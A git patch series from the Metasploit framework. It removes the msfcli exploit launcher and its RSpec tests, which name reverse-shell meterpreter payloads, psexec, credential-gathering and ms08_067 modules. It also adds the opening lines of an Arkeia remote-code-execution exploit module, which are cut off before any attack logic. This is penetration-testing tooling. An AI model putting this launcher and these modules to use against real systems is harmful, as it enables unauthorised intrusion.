-      'Indent'  => 4,
-      'Columns' => [ 'Name', 'Description' ])
-
-    framework.auxiliary.each_module { |name, mod|
-      tbl << [ 'auxiliary/' + name, mod.new.name ]
-    }
-
-    ext << tbl.to_s + "\n"
-    ext
-  end
-
-
-  #
-  # Payload naming style is kind of inconsistent, so instead of
-  # finding the exact path name, we provide the most educated guess (whitelist)
-  # based on platform/stage type/session type/payload name suffix/etc.
-  #
-  def guess_payload_name(p)
-    matches       = []
-    payload       = p.split('/')
-    platform      = payload[0]
-    suffix        = payload[-1]
-    stage_types   = ['singles', 'stagers', 'stages']
-    session_types = ['meterpreter', 'shell']
-    arch          = ''
-
-    # Rule out some possibilities
-    if p =~ /meterpreter/i
-      session_types.delete('shell')
-      stage_types.delete('singles')
-    end
-    if p =~ /shell\/.+$/i
-      session_types.delete('meterpreter')
-      stage_types.delete('singles')
-    end
-
-    if p =~ /x64/i
-      arch = 'x64'
-    elsif p =~ /x86/i
-      arch = 'x86'
-    end
-
-    # Determine if the payload is staged. If it is, then
-    # we need to load that staged module too.
-    if session_types.include?('shell') and stage_types.include?('stages')
-      if arch == 'x64'
-        matches << /stages\/#{platform}\/x64\/shell/
-      elsif arch == 'x86'
-        matches << /stages\/#{platform}\/x86\/shell/
-      else
-        matches << /stages\/#{platform}\/shell/
-      end
-    elsif session_types.include?('meterpreter') and stage_types.include?('stages')
-      if arch == 'x64'
-        matches << /stages\/#{platform}\/x64\/meterpreter/
-      elsif arch == 'x86'
-        matches << /stages\/#{platform}\/x86\/meterpreter/
-      else
-        matches << /stages\/#{platform}\/meterpreter/
-      end
-    end
-
-    # Guess the second possible match
-    stage_types   *= "|"
-    session_types *= "|"
-
-    if arch == 'x64'
-      matches << /payloads\/(#{stage_types})\/#{platform}\/x64\/.*(#{suffix})\.rb$/
-    elsif arch == 'x86'
-      matches << /payloads\/(#{stage_types})\/#{platform}\/x86\/.*(#{suffix})\.rb$/
-    else
-      matches << /payloads\/(#{stage_types})\/#{platform}\/.*(#{suffix})\.rb$/
-    end
-
-    matches
-  end
-
-
-  #
-  # Returns a whitelist for encoder modules
-  #
-  def guess_encoder_name(e)
-    [/encoders\/#{e}/]
-  end
-
-
-  #
-  # Returns a whitelist for nop modules
-  #
-  def guess_nop_name(n)
-    [/nops\/#{n}/]
-  end
-
-
-  #
-  # Returns a whitelist for post modules
-  #
-  def guess_post_name(p)
-    [/post\/#{p}/]
-  end
-
-
-  #
-  # Returns possible patterns like exploit/aux, encoders, nops we want to
-  # load to the whitelist.
-  #
-  def generate_whitelist
-    whitelist = []
-    whitelist << /#{@args[:module_name]}/ # Add exploit
-
-    # nil = not set, empty = manually set to load nothing
-    encoder_val   = nil
-    nops_val      = nil
-    post_val      = nil
-    payload_param = ''
-    junk_args     = []
-
-    @args[:params].each { |args|
-      var, val = args.split('=', 2)
-      next if val.nil?
-
-      case var.downcase
-      when 'payload'
-        payload_param = val
-        if val.empty?
-          junk_args << args
-        else
-          whitelist.concat(guess_payload_name(val))
-        end
-
-      when 'encoder'
-        encoder_val = val
-        if val.empty?
-          junk_args << args
-        else
-          whitelist.concat(guess_encoder_name(val))
-        end
-
-      when 'nop'
-        nops_val = val
-        if val.empty?
-          junk_args << args
-        else
-          whitelist.concat(guess_nop_name(val))
-        end
-
-      when 'post'
-        post_val = val
-        if val.empty?
-          junk_args << args
-        else
-          whitelist.concat(guess_post_name(val))
-        end
-      end
-    }
-
-    # Cleanup empty args
-    junk_args.each { |args| @args[:params].delete(args) }
-
-    # If it's an exploit and no payload set, load them all.
-    if @args[:module_name] !~ /auxiliary\// and payload_param.empty?
-      whitelist << /payloads\/.+/
-    end
-
-    # Add post modules list if not set
-    if post_val.nil?
-      whitelist << /post\/.+/
-    end
-
-    # Add default encoders if not set
-    # This one is needed no matter what
-    whitelist << /encoders\/generic\/*/
-    if encoder_val.nil?
-      if payload_param =~ /^.+\.x64.+/
-        whitelist << /encoders\/x64\/.+/
-      elsif payload_param =~ /^.+\.x86.+/
-        whitelist << /encoders\/x86\/.+/
-      else
-        whitelist << /encoders\/.+/
-      end
-    end
-
-    # Add default NOP modules if not set
-    if nops_val.nil?
-      whitelist << /nops\/.+/
-    end
-
-    whitelist
-  end
-
-
-  #
-  # Initializes exploit/payload/encoder/nop modules.
-  #
-  def init_modules
-    $stdout.puts "[*] Initializing modules..."
-
-    module_name = @args[:module_name]
-    modules = {
-      :module  => nil,  # aux or exploit instance
-      :payload => nil,  # payload instance
-      :encoder => nil,  # encoder instance
-      :nop     => nil   # nop instance
-    }
-
-    whitelist = generate_whitelist
-
-    # Load up all the possible modules, this is where things get slow again
-    framework.init_module_paths({:whitelist=>whitelist})
-    if (framework.modules.module_load_error_by_path.length > 0)
-      print("Warning: The following modules could not be loaded!\n\n")
-
-      framework.modules.module_load_error_by_path.each do |path, error|
-        print("\t#{path}: #{error}\n\n")
-      end
-
-      return {}
-    end
-
-    # Determine what type of module it is
-    if module_name =~ /exploit\/(.*)/
-      modules[:module] = framework.exploits.create($1)
-    elsif module_name =~ /auxiliary\/(.*)/
-      modules[:module] = framework.auxiliary.create($1)
-    elsif module_name =~ /post\/(.*)/
-      modules[:module] = framework.post.create($1)
-    else
-      modules[:module] = framework.exploits.create(module_name)
-      if modules[:module].nil?
-        # Try falling back on aux modules
-        modules[:module] = framework.auxiliary.create(module_name)
-      end
-    end
-
-    if modules[:module].nil?
-      # Still nil? Ok then, probably invalid
-      return {}
-    end
-
-    modules[:module].init_ui(
-      Rex::Ui::Text::Input::Stdio.new,
-      Rex::Ui::Text::Output::Stdio.new
-    )
-
-    # Import options
-    begin
-      modules[:module].datastore.import_options_from_s(@args[:params].join('_|_'), '_|_')
-    rescue Rex::ArgumentParseError => e
-      raise e
-    end
-
-    # Create the payload to use
-    if (modules[:module].datastore['PAYLOAD'])
-      modules[:payload] = framework.payloads.create(modules[:module].datastore['PAYLOAD'])
-      if modules[:payload]
-        modules[:payload].datastore.import_options_from_s(@args[:params].join('_|_'), '_|_')
-      end
-    end
-
-    # Create the encoder to use
-    if modules[:module].datastore['ENCODER']
-      modules[:encoder] = framework.encoders.create(modules[:module].datastore['ENCODER'])
-      if modules[:encoder]
-        modules[:encoder].datastore.import_options_from_s(@args[:params].join('_|_'), '_|_')
-      end
-    end
-
-    # Create the NOP to use
-    if modules[:module].datastore['NOP']
-      modules[:nop] = framework.nops.create(modules[:module].datastore['NOP'])
-      if modules[:nop]
-        modules[:nop].datastore.import_options_from_s(@args[:params].join('_|_'), '_|_')
-      end
-    end
-
-    modules
-  end
-
-
-  def show_summary(m)
-    readable = Msf::Serializer::ReadableText
-    $stdout.puts("\n" + readable.dump_module(m[:module], @indent))
-    $stdout.puts("\n" + readable.dump_module(m[:payload], @indent)) if m[:payload]
-    $stdout.puts("\n" + readable.dump_module(m[:encoder], @indent)) if m[:encoder]
-    $stdout.puts("\n" + readable.dump_module(m[:nop], @indent))     if m[:nop]
-  end
-
-
-  def show_options(m)
-    readable = Msf::Serializer::ReadableText
-    $stdout.puts("\n" + readable.dump_options(m[:module], @indent))
-    $stdout.puts("\nPayload:\n\n" + readable.dump_options(m[:payload], @indent)) if m[:payload]
-    $stdout.puts("\nEncoder:\n\n" + readable.dump_options(m[:encoder], @indent)) if m[:encoder]
-    $stdout.puts("\nNOP\n\n" + readable.dump_options(m[:nop], @indent))          if m[:nop]
-  end
-
-
-  def show_missing(m)
-    readable = Msf::Serializer::ReadableText
-    $stdout.puts("\n" + readable.dump_options(m[:module], @indent, true))
-    $stdout.puts("\nPayload:\n\n" + readable.dump_options(m[:payload], @indent, true)) if m[:payload]
-    $stdout.puts("\nEncoder:\n\n" + readable.dump_options(m[:encoder], @indent, true)) if m[:encoder]
-    $stdout.puts("\nNOP\n\n" + readable.dump_options(m[:nop], @indent, true))          if m[:nop]
-  end
-
-
-  def show_advanced(m)
-    readable = Msf::Serializer::ReadableText
-    $stdout.puts("\n" + readable.dump_advanced_options(m[:module], @indent))
-    $stdout.puts("\nPayload:\n\n" + readable.dump_advanced_options(m[:payload], @indent)) if m[:payload]
-    $stdout.puts("\nEncoder:\n\n" + readable.dump_advanced_options(m[:encoder], @indent)) if m[:encoder]
-    $stdout.puts("\nNOP:\n\n" + readable.dump_advanced_options(m[:nop], @indent))         if m[:nop]
-  end
-
-
-  def show_ids_evasion(m)
-    readable = Msf::Serializer::ReadableText
-    $stdout.puts("\n" + readable.dump_evasion_options(m[:module], @indent))
-    $stdout.puts("\nPayload:\n\n" + readable.dump_evasion_options(m[:payload], @indent)) if m[:payload]
-    $stdout.puts("\nEncoder:\n\n" + readable.dump_evasion_options(m[:encoder], @indent)) if m[:encoder]
-    $stdout.puts("\nNOP:\n\n" + readable.dump_evasion_options(m[:nop], @indent))         if m[:nop]
-  end
-
-
-  def show_payloads(m)
-    readable = Msf::Serializer::ReadableText
-    txt      = "Compatible payloads"
-    $stdout.puts("\n" + readable.dump_compatible_payloads(m[:module], @indent, txt))
-  end
-
-
-  def show_targets(m)
-    readable = Msf::Serializer::ReadableText
-    $stdout.puts("\n" + readable.dump_exploit_targets(m[:module], @indent))
-  end
-
-
-  def show_actions(m)
-    readable = Msf::Serializer::ReadableText
-    $stdout.puts("\n" + readable.dump_module_actions(m[:module], @indent))
-  end
-
-
-  def show_check(m)
-    begin
-      if (code = m[:module].check_simple(
-        'LocalInput'    => Rex::Ui::Text::Input::Stdio.new,
-        'LocalOutput'   => Rex::Ui::Text::Output::Stdio.new))
-        stat = (code == Msf::Exploit::CheckCode::Vulnerable) ? '[+]' : '[*]'
-
-        $stdout.puts("#{stat} #{code[1]}")
-      else
-        $stdout.puts("Check failed: The state could not be determined.")
-      end
-    rescue
-      $stdout.puts("Check failed: #{$!}")
-    end
-  end
-
-
-  def execute_module(m)
-    con = Msf::Ui::Console::Driver.new(
-      Msf::Ui::Console::Driver::DefaultPrompt,
-      Msf::Ui::Console::Driver::DefaultPromptChar,
-      {
-        'Framework' => framework,
-        # When I use msfcli, chances are I want speed, so ASCII art fanciness
-        # probably isn't much of a big deal for me.
-        'DisableBanner' => true
-      })
-
-    module_class = (m[:module].fullname =~ /^auxiliary/ ? 'auxiliary' : 'exploit')
-
-    con.run_single("use #{module_class}/#{m[:module].refname}")
-
-    # Assign console parameters
-    @args[:params].each do |arg|
-      k,v = arg.split("=", 2)
-      con.run_single("set #{k} #{v}")
-    end
-
-    # Run the exploit
-    con.run_single("exploit")
-
-    # If we have sessions or jobs, keep running
-    if framework.sessions.length > 0 or framework.jobs.length > 0
-      con.run
-    else
-      con.run_single("quit")
-    end
-  end
-
-
-  #
-  # Selects a mode chosen by the user and run it
-  #
-  def engage_mode(modules)
-    case @args[:mode].downcase
-    when 'h'
-      usage
-    when "s"
-      show_summary(modules)
-    when "o"
-      show_options(modules)
-    when "m"
-      show_missing(modules)
-    when "a"
-      show_advanced(modules)
-    when "i"
-      show_ids_evasion(modules)
-    when "p"
-      if modules[:module].file_path =~ /auxiliary\//i
-        $stdout.puts("\nError: This type of module does not support payloads")
-      else
-        show_payloads(modules)
-      end
-    when "t"
-      puts
-      if modules[:module].file_path =~ /auxiliary\//i
-        $stdout.puts("\nError: This type of module does not support targets")
-      else
-        show_targets(modules)
-      end
-    when "ac"
-      if modules[:module].kind_of?(Msf::Module::HasActions)
-        show_actions(modules)
-      else
-        $stdout.puts("\nError: This type of module does not support actions")
-      end
-    when "c"
-      show_check(modules)
-    when "e"
-      execute_module(modules)
-    else
-      usage("Invalid mode #{@args[:mode]}")
-    end
-  end
-
-
-  def run!
-    if @args[:module_name] == "-h"
-      usage()
-      exit
-    end
-
-    $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
-    require 'msfenv'
-    require 'msf/ui'
-    require 'msf/base'
-
-    if @args[:module_name].nil?
-      ext = dump_module_list
-      usage(nil, ext)
-      exit
-    end
-
-    begin
-      modules = init_modules
-    rescue Rex::ArgumentParseError => e
-      puts "[!] Error: #{e.message}\n\n"
-      exit
-    end
-
-    if modules[:module].nil?
-      usage("Invalid module: #{@args[:module_name]}")
-      exit
-    end
-
-    # Process special var/val pairs...
-    Msf::Ui::Common.process_cli_arguments(framework, @args[:params])
-
-    engage_mode(modules)
-    $stdout.puts
-  end
-end
-
-
-if __FILE__ == $PROGRAM_NAME
-  cli = Msfcli.new(ARGV)
-  cli.run!
-end
diff --git a/spec/msfcli_spec.rb b/spec/msfcli_spec.rb
deleted file mode 100644
index ce31679cd5..0000000000
--- a/spec/msfcli_spec.rb
+++ /dev/null
@@ -1,812 +0,0 @@
-require 'spec_helper'
-
-load Metasploit::Framework.root.join('msfcli').to_path
-
-require 'msfenv'
-require 'msf/ui'
-require 'msf/base'
-
-
-describe Msfcli, :content do
-  subject(:msfcli) {
-    described_class.new(args)
-  }
-
-  #
-  # methods
-  #
-
-  # Get stdout:
-  # http://stackoverflow.com/questions/11349270/test-output-to-command-line-with-rspec
-  def get_stdout(&block)
-    out = $stdout
-    $stdout = fake = StringIO.new
-    begin
-      yield
-    ensure
-      $stdout = out
-    end
-    fake.string
-  end
-
-  #
-  # lets
-  #
-
-  let(:args) {
-    []
-  }
-
-  context "#initialize" do
-    context 'with module name' do
-      let(:args) {
-        [
-            module_name,
-            *params
-        ]
-      }
-
-      let(:module_name) {
-        'multi/handler'
-      }
-
-      let(:params) {
-        %w{payload=windows/meterpreter/reverse_tcp lhost=127.0.0.1}
-      }
-
-      let(:parsed_args) {
-        msfcli.instance_variable_get(:@args)
-      }
-
-      context 'multi/handler' do
-        context 'with mode' do
-          let(:args) {
-            super() + [mode]
-          }
-
-          context 'E' do
-            let(:mode) {
-              'E'
-            }
-
-            it 'parses module name into :module_name arg' do
-              expect(parsed_args[:module_name]).to eq(module_name)
-            end
-
-            it 'parses mode into :mode arg' do
-              expect(parsed_args[:mode]).to eq(mode)
-            end
-
-            it 'parses module parameters between module name and mode' do
-              expect(parsed_args[:params]).to eq(params)
-            end
-          end
-
-          context 's' do
-            let(:mode) {
-              's'
-            }
-
-            it "parses mode as 's' (summary)" do
-              expect(parsed_args[:mode]).to eq(mode)
-            end
-          end
-        end
-
-        context 'without mode' do
-          let(:args) {
-            [
-                module_name
-            ]
-          }
-
-          it "parses mode as 'h' (help) by default" do
-            expect(parsed_args[:mode]).to eq('h')
-          end
-        end
-      end
-
-      context 'exploit/windows/browser/ie_cbutton_uaf' do
-        let(:module_name) {
-          'exploit/windows/browser/ie_cbutton_uaf'
-        }
-
-        it "strips 'exploit/' prefix for :module_name" do
-          expect(parsed_args[:module_name]).to eq('windows/browser/ie_cbutton_uaf')
-        end
-      end
-
-      context 'exploit/windows/browser/ie_cbutton_uaf' do
-        let(:module_name) {
-          'exploits/windows/browser/ie_cbutton_uaf'
-        }
-
-        it "strips 'exploits/' prefix for :module_name" do
-          expect(parsed_args[:module_name]).to eq('windows/browser/ie_cbutton_uaf')
-        end
-      end
-    end
-  end
-
-  context "#usage" do
-    it "prints Usage" do
-      out = get_stdout {
-        msfcli.usage
-      }
-
-      expect(out).to include('Usage')
-    end
-  end
-
-  #
-  # This one is slow because we're loading all modules
-  #
-  context "#dump_module_list" do
-    include_context 'Metasploit::Framework::Spec::Constants cleaner'
-
-    let(:framework) {
-      msfcli.framework
-    }
-
-    it 'dumps a listof modules' do
-      tbl = ''
-
-      stdout = get_stdout {
-        tbl = msfcli.dump_module_list
-      }
-
-      expect(tbl).to include 'Exploits'
-      expect(stdout).to include 'Please wait'
-    end
-  end
-
-  context "#guess_payload_name" do
-    subject(:guess_payload_name) {
-      msfcli.guess_payload_name(payload_reference_name)
-    }
-
-    context 'with windows/meterpreter/reverse_tcp' do
-      let(:payload_reference_name) {
-        'windows/meterpreter/reverse_tcp'
-      }
-
-      it {
-        is_expected.to eq(
-                           [
-                               /stages\/windows\/meterpreter/,
-                               /payloads\/(stagers|stages)\/windows\/.*(reverse_tcp)\.rb$/
-                           ]
-                       )
-      }
-    end
-
-    context 'with windows/shell/reverse_tcp' do
-      let(:payload_reference_name) {
-        'windows/shell/reverse_tcp'
-      }
-
-      it {
-        is_expected.to eq(
-                           [
-                               /stages\/windows\/shell/,
-                               /payloads\/(stagers|stages)\/windows\/.*(reverse_tcp)\.rb$/
-                           ]
-                       )
-      }
-    end
-
-    context 'with php/meterpreter_reverse_tcp' do
-      let(:payload_reference_name) {
-        'php/meterpreter_reverse_tcp'
-      }
-
-      it {
-        is_expected.to eq(
-                              [
-                                  /stages\/php\/meterpreter/,
-                                  /payloads\/(stagers|stages)\/php\/.*(meterpreter_reverse_tcp)\.rb$/
-                              ]
-                          )
-      }
-    end
-
-    context 'with linux/x86/meterpreter/reverse_tcp' do
-      let(:payload_reference_name) {
-        'linux/x86/meterpreter/reverse_tcp'
-      }
-
-      it {
-        is_expected.to eq(
-                           [
-                               /stages\/linux\/x86\/meterpreter/,
-                               /payloads\/(stagers|stages)\/linux\/x86\/.*(reverse_tcp)\.rb$/
-                           ]
-                       )
-      }
-    end
-
-    context 'with java/meterpreter/reverse_tcp' do
-      let(:payload_reference_name) {
-        'java/meterpreter/reverse_tcp'
-      }
-
-      it {
-        is_expected.to eq(
-                           [
-                               /stages\/java\/meterpreter/,
-                               /payloads\/(stagers|stages)\/java\/.*(reverse_tcp)\.rb$/
-                           ]
-                       )
-      }
-    end
-
-    context 'with cmd/unix/reverse' do
-      let(:payload_reference_name) {
-        'cmd/unix/reverse'
-      }
-
-      it {
-        is_expected.to eq(
-                           [
-                               /stages\/cmd\/shell/,
-                               /payloads\/(singles|stagers|stages)\/cmd\/.*(reverse)\.rb$/
-                           ]
-                       )
-      }
-    end
-
-    context 'with bsd/x86/shell_reverse_tcp' do
-      let(:payload_reference_name) {
-        'bsd/x86/shell_reverse_tcp'
-      }
-
-      it {
-        is_expected.to eq(
-                           [
-                               /stages\/bsd\/x86\/shell/,
-                               /payloads\/(singles|stagers|stages)\/bsd\/x86\/.*(shell_reverse_tcp)\.rb$/
-                           ]
-                       )
-      }
-
-    end
-  end
-
-  context "#guess_encoder_name" do
-    subject(:guess_encoder_name) {
-      msfcli.guess_encoder_name(encoder_reference_name)
-    }
-
-    context 'with x86/shikata_ga_nai' do
-      let(:encoder_reference_name) {
-        'x86/shikata_ga_nai'
-      }
-
-      it {
-        is_expected.to eq(
-                           [/encoders\/#{encoder_reference_name}/]
-                       )
-      }
-    end
-  end
-
-
-  context "#guess_nop_name" do
-    subject(:guess_nop_name) {
-      msfcli.guess_nop_name(nop_reference_name)
-    }
-
-    context 'with x86/shikata_ga_nai' do
-      let(:nop_reference_name) {
-        'x86/single_byte'
-      }
-
-      it {
-        is_expected.to eq(
-                           [/nops\/#{nop_reference_name}/]
-                       )
-      }
-    end
-  end
-
-  context "#generate_whitelist" do
-    subject(:generate_whitelist) {
-      msfcli.generate_whitelist.map(&:to_s)
-    }
-
-    let(:args) {
-      [
-          'multi/handler',
-          "payload=#{payload_reference_name}",
-          'lhost=127.0.0.1',
-          mode
-      ]
-    }
-
-    let(:mode) {
-      'E'
-    }
-
-    context 'with payload' do
-      context 'linux/x86/reverse_tcp' do
-        let(:payload_reference_name) {
-          'linux/x86/reverse_tcp'
-        }
-
-        context 'with encoder' do
-          let(:args) {
-            super().tap { |args|
-              args.insert(-2, "encoder=#{encoder_reference_name}")
-            }
-          }
-
-          context 'x86/fnstenv_mov' do
-            let(:encoder_reference_name) {
-              'x86/fnstenv_mov'
-            }
-
-            it {
-              is_expected.to match_array(
-                                 [
-                                     /multi\/handler/,
-                                     /stages\/linux\/x86\/shell/,
-                                     /payloads\/(singles|stagers|stages)\/linux\/x86\/.*(reverse_tcp)\.rb$/,
-                                     /encoders\/x86\/fnstenv_mov/,
-                                     /post\/.+/,
-                                     /encoders\/generic\/*/,
-                                     /nops\/.+/
-                                 ].map(&:to_s)
-                             )
-            }
-          end
-        end
-      end
-
-      context 'windows/meterpreter/reverse_tcp' do
-        let(:payload_reference_name) {
-          'windows/meterpreter/reverse_tcp'
-        }
-
-        context 'with default options' do
-          it {
-            is_expected.to match_array(
-                               [
-                                   /multi\/handler/,
-                                   /stages\/windows\/meterpreter/,
-                                   /payloads\/(stagers|stages)\/windows\/.*(reverse_tcp)\.rb$/,
-                                   /post\/.+/,
-                                   /encoders\/generic\/*/,
-                                   /encoders\/.+/,
-                                   /nops\/.+/
-                               ].map(&:to_s)
-                           )
-          }
-        end
-
-        context 'with encoder' do
-          let(:args) {
-            super().tap { |args|
-              args.insert(-2, "encoder=#{encoder_reference_name}")
-            }
-          }
-
-          context "''" do
-            let(:encoder_reference_name) do
-              "''"
-            end
-
-            context 'with post' do
-              let(:args) {
-                super().tap { |args|
-                  args.insert(-2, "post=#{post_reference_name}")
-                }
-              }
-
-              context "''" do
-                let(:post_reference_name) do
-                  "''"
-                end
-
-                context "with nop" do
-                  let(:args) {
-                    super().tap { |args|
-                      args.insert(-2, "nop=#{nop_reference_name}")
-                    }
-                  }
-
-                  context "''" do
-                    let(:nop_reference_name) {
-                      "''"
-                    }
-
-                    it {
-                      is_expected.to match_array(
-                                         [
-                                             /multi\/handler/,
-                                             /stages\/windows\/meterpreter/,
-                                             /payloads\/(stagers|stages)\/windows\/.*(reverse_tcp)\.rb$/,
-                                             /encoders\/''/,
-                                             /post\/''/,
-                                             /nops\/''/,
-                                             /encoders\/generic\/*/
-                                         ].map(&:to_s)
-                                     )
-                    }
-                  end
-                end
-              end
-            end
-          end
-
-          context "<blank>" do
-            let(:encoder_reference_name) do
-              ""
-            end
-
-            context 'with post' do
-              let(:args) {
-                super().tap { |args|
-                  args.insert(-2, "post=#{post_reference_name}")
-                }
-              }
-
-              context "<blank>" do
-                let(:post_reference_name) do
-                  ""
-                end
-
-                context "with nop" do
-                  let(:args) {
-                    super().tap { |args|
-                      args.insert(-2, "nop=#{nop_reference_name}")
-                    }
-                  }
-
-                  context "<blank>" do
-                    let(:nop_reference_name) {
-                      ""
-                    }
-
-                    it {
-                      is_expected.to match_array(
-                                         [
-                                             /multi\/handler/,
-                                             /stages\/windows\/meterpreter/,
-                                             /payloads\/(stagers|stages)\/windows\/.*(reverse_tcp)\.rb$/,
-                                             /encoders\/generic\/*/
-                                         ].map(&:to_s)
-                                     )
-                    }
-                  end
-                end
-              end
-            end
-          end
-        end
-      end
-    end
-  end
-
-  context "#init_modules" do
-    include_context 'Metasploit::Framework::Spec::Constants cleaner'
-
-    let(:args) {
-      [
-          module_name,
-          mode
-      ]
-    }
-
-    let(:framework) {
-      msfcli.framework
-    }
-
-    let(:mode) {
-      'S'
-    }
-
-    context 'with exploit/windows/smb/psexec' do
-      let(:module_name) {
-        'exploit/windows/smb/psexec'
-      }
-
-      it 'creates the module in :module' do
-        modules = {}
-
-        Kernel.quietly {
-          modules = msfcli.init_modules
-        }
-
-        expect(modules[:module]).to be_an Msf::Exploit
-        expect(modules[:module].fullname).to eq(module_name)
-      end
-    end
-
-    context 'with auxiliary/server/browser_autopwn' do
-      let(:module_name) {
-        'auxiliary/server/browser_autopwn'
-      }
-
-      it 'creates the module in :module' do
-        modules = {}
-
-        Kernel.quietly {
-          modules = msfcli.init_modules
-        }
-
-        expect(modules[:module]).to be_an Msf::Auxiliary
-        expect(modules[:module].fullname).to eq(module_name)
-      end
-    end
-
-    context 'with post/windows/gather/credentials/gpp' do
-      let(:module_name) {
-        'post/windows/gather/credentials/gpp'
-      }
-
-      it 'creates the module in :module' do
-        modules = {}
-
-        Kernel.quietly {
-          modules = msfcli.init_modules
-        }
-
-        expect(modules[:module]).to be_an Msf::Post
-        expect(modules[:module].fullname).to eq(module_name)
-      end
-    end
-
-    context 'with exploit/multi/handler' do
-      let(:module_name) {
-        'multi/handler'
-      }
-
-      it 'creates the module in :module' do
-        modules = {}
-
-        Kernel.quietly {
-          modules = msfcli.init_modules
-        }
-
-        expect(modules[:module]).to be_an Msf::Exploit
-        expect(modules[:module].refname).to eq(module_name)
-      end
-
-      context 'with payload' do
-        let(:args) {
-          super().tap { |args|
-            args.insert(-2, "payload=#{payload_reference_name}")
-          }
-        }
-
-        context 'windows/meterpreter/reverse_tcp' do
-          let(:payload_reference_name) do
-            'windows/meterpreter/reverse_tcp'
-          end
-
-          it 'creates payload in :payload' do
-            modules = {}
-
-            Kernel.quietly {
-              modules = msfcli.init_modules
-            }
-
-            expect(modules[:payload]).to be_an Msf::Payload
-            expect(modules[:payload].refname).to eq(payload_reference_name)
-          end
-        end
-      end
-
-      context 'with data store options' do
-        let(:args) {
-          super().tap { |args|
-            args.insert(-2, "#{data_store_key}=#{data_store_value}")
-          }
-        }
-
-        let(:data_store_key) {
-          'lhost'
-        }
-
-        let(:data_store_value) {
-          '127.0.0.1'
-        }
-
-        it 'sets data store on :module' do
-          modules = {}
-
-          Kernel.quietly {
-            modules = msfcli.init_modules
-          }
-
-          expect(modules[:module].datastore[data_store_key]).to eq(data_store_value)
-        end
-      end
-    end
-
-    context 'with invalid module name' do
-      let(:module_name) {
-        'invalid/module/name'
-      }
-
-      it 'returns empty modules Hash' do
-        modules = nil
-
-        Kernel.quietly {
-          modules = msfcli.init_modules
-        }
-
-        expect(modules).to eq({})
-      end
-    end
-  end
-
-  context "#engage_mode" do
-    include_context 'Metasploit::Framework::Spec::Constants cleaner'
-
-    subject(:engage_mode) {
-      msfcli.engage_mode(modules)
-    }
-
-    let(:args) {
-      [
-          module_name,
-          mode
-      ]
-    }
-
-    let(:framework) {
-      msfcli.framework
-    }
-
-    let(:modules) {
-      msfcli.init_modules
-    }
-
-    context 'with auxiliary/scanner/http/http_put' do
-      let(:module_name) {
-        'auxiliary/scanner/http/http_put'
-      }
-
-      context 'with mode' do
-        context 'ac' do
-          let(:mode) {
-            'ac'
-          }
-
-          specify {
-            expect(get_stdout { engage_mode }).to match(/DELETE/)
-          }
-        end
-      end
-    end
-
-    context 'with auxiliary/scanner/http/http_version' do
-      let(:module_name) {
-        'auxiliary/scanner/http/http_version'
-      }
-
-      context 'with mode' do
-        context 'A' do
-          let(:mode) {
-            'A'
-          }
-
-          specify {
-            expect(get_stdout { engage_mode }).to match(/UserAgent/)
-          }
-        end
-
-        context 'I' do
-          let(:mode) {
-            'I'
-          }
-
-          specify {
-            expect(get_stdout { engage_mode }).to match(/Insert fake relative directories into the uri/)
-          }
-        end
-
-        context 'O' do
-          let(:mode) {
-            'O'
-          }
-
-          specify {
-            expect(get_stdout { engage_mode }).to match(/The target address range or CIDR identifier/)
-          }
-        end
-
-        context 'P' do
-          let(:mode) {
-            'P'
-          }
-
-          specify {
-            expect(get_stdout { engage_mode }).to match(/This type of module does not support payloads/)
-          }
-        end
-
-        context 's' do
-          let(:mode) {
-            's'
-          }
-
-          specify {
-            expect(get_stdout { engage_mode }).to match %r{Module: auxiliary/scanner/http/http_version}
-          }
-        end
-
-        context 't' do
-          let(:mode) {
-            't'
-          }
-
-          specify {
-            expect(get_stdout { engage_mode }).to match(/This type of module does not support targets/)
-          }
-        end
-      end
-    end
-
-    context 'with windows/browser/ie_cbutton_uaf' do
-      let(:module_name) {
-        'windows/browser/ie_cbutton_uaf'
-      }
-
-      context 'with mode' do
-        context 'ac' do
-          let(:mode) {
-            'ac'
-          }
-
-          specify {
-            expect(get_stdout { engage_mode }).to match(/This type of module does not support actions/)
-          }
-        end
-
-        context 'P' do
-          let(:mode) {
-            'P'
-          }
-
-          specify {
-            expect(get_stdout { engage_mode }).to match(/windows\/meterpreter\/reverse_tcp/)
-          }
-        end
-
-        context 'T' do
-          let(:mode) {
-            'T'
-          }
-
-          specify {
-            expect(get_stdout { engage_mode }).to match(/IE 8 on Windows 7/)
-          }
-        end
-      end
-    end
-
-    context 'with windows/smb/ms08_067_netapi' do
-      let(:args) {
-        super().tap { |args|
-          args.insert(-2, "RHOST=127.0.0.1")
-        }
-      }
-
-      let(:module_name) {
-        'windows/smb/ms08_067_netapi'
-      }
-
-      context 'with mode C' do
-        let(:mode) {
-          'C'
-        }
-
-        specify {
-          expect(get_stdout { engage_mode }).to match(/#{Msf::Exploit::CheckCode::Unknown[1]}/)
-        }
-      end
-    end
-  end
-end
diff --git a/tools/profile.sh b/tools/profile.sh
index 44784fa4ce..3623c8662e 100755
--- a/tools/profile.sh
+++ b/tools/profile.sh
@@ -1,3 +1,3 @@
 #!/bin/sh
-CPUPROFILE_FREQUENCY=500 CPUPROFILE=profile.dat RUBYOPT="-r`gem which perftools | tail -1`" ruby msfcli z
+CPUPROFILE_FREQUENCY=500 CPUPROFILE=profile.dat RUBYOPT="-r`gem which perftools | tail -1`" ruby msfconsole -x "exit" z
 pprof.rb --gif profile.dat > profile.gif

From 52d41c83091f68c99213368f164a17e31b958038 Mon Sep 17 00:00:00 2001
From: xistence <xistence@0x90.nl>
Date: Fri, 10 Jul 2015 09:51:28 +0700
Subject: [PATCH 0690/1013] Western Digital Arkeia 'ARKFS_EXEC_CMD' <= v11.0.12
 Remote Code Execution

---
 .../exploits/multi/misc/arkeia_agent_exec.rb  | 299 ++++++++++++++++++
 1 file changed, 299 insertions(+)
 create mode 100644 modules/exploits/multi/misc/arkeia_agent_exec.rb

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
new file mode 100644
index 0000000000..8be8764850
--- /dev/null
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -0,0 +1,299 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+
+  def initialize(info = {})
